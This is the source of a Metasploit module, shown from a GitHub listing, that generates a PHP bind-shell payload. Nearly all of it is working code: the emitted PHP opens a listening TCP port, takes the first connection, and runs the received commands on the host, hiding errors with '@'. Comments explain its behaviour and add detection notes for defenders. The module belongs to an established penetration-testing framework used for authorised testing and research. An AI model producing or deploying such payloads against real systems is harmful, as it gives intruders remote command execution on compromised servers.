rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/php/bind_php.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
  # Size is declared dynamic instead of a fixed number; the generated PHP
  # below embeds a random variable name and the configured port.
  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Payload::Php
  include Msf::Sessions::CommandShellOptions

  # Registers this payload's metadata with the framework.
  #
  # @param info [Hash] metadata passed in by the caller; combined with the
  #   values below through merge_info before being handed to the parent
  def initialize(info = {})
    metadata = merge_info(
      info,
      'Name' => 'PHP Command Shell, Bind TCP (via PHP)',
      'Description' => 'Listen for a connection and spawn a command shell via php',
      'Author' => ['egypt', 'diaul <diaul[at]devilopers.org>'],
      'License' => BSD_LICENSE,
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Handler' => Msf::Handler::BindTcp,
      'Session' => Msf::Sessions::CommandShell,
      'PayloadType' => 'cmd',
      'Payload' => {
        'Offsets' => {},
        'Payload' => ''
      }
    )

    super(metadata)
  end

  # Builds the PHP source text for the bind shell.
  #
  # What the emitted PHP does, as far as this listing shows:
  # * listens on TCP port datastore['LPORT'], using socket_create_listen when
  #   it is callable and not in the disabled-functions variable, otherwise
  #   socket_create / socket_bind / socket_listen (backlog 5);
  # * accepts a single connection, then closes the listening socket;
  # * reads up to 2048 bytes per line from the peer, handles "cd ", "quit"
  #   and "exit" itself, and passes everything else to the code produced by
  #   php_system_block, writing the collected output back to the peer.
  #
  # Review notes for defenders:
  # * no check of the connecting peer is visible here, so the first client to
  #   reach the port gets the command loop;
  # * every socket call is prefixed with "@", which suppresses PHP error
  #   output, so failures are unlikely to appear in PHP logs; a PHP process
  #   holding a listening TCP socket is the more dependable signal;
  # * the fallback path binds to address 0 -- presumably all interfaces,
  #   TODO confirm against the PHP sockets documentation.
  #
  # @return [String] PHP source; the squiggly heredoc emits it without
  #   leading indentation, as in the listing
  def php_bind_shell
    # Random 4-7 letter PHP variable name, reused by the preamble and by the
    # command-execution block for the disabled-functions list.
    disabled_var = "$#{Rex::Text.rand_text_alpha(4..7)}"

    <<~END_OF_PHP_CODE
      #{php_preamble(disabled_varname: disabled_var)}
      $port=#{datastore['LPORT']};

      $scl='socket_create_listen';
      if(is_callable($scl)&&!in_array($scl,#{disabled_var})){
      $sock=@$scl($port);
      }else{
      $sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
      $ret=@socket_bind($sock,0,$port);
      $ret=@socket_listen($sock,5);
      }
      $msgsock=@socket_accept($sock);
      @socket_close($sock);

      while(FALSE!==@socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL))
      {
      $o = '';
      $c=@socket_read($msgsock,2048,PHP_NORMAL_READ);
      if(FALSE===$c){break;}
      if(substr($c,0,3) == 'cd '){
      chdir(substr($c,3,-1));
      } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
      break;
      }else{
      #{php_system_block({ cmd_varname: '$c', output_varname: '$o', disabled_varname: disabled_var })}
      }
      @socket_write($msgsock,$o,strlen($o));
      }
      @socket_close($msgsock);
    END_OF_PHP_CODE
  end

  # Assembles the final payload: the parent's generate result with the PHP
  # bind-shell source appended.
  #
  # @param _opts [Hash] accepted for interface compatibility; not read here
  # @return the concatenation of super's result and php_bind_shell
  def generate(_opts = {})
    super + php_bind_shell
  end
end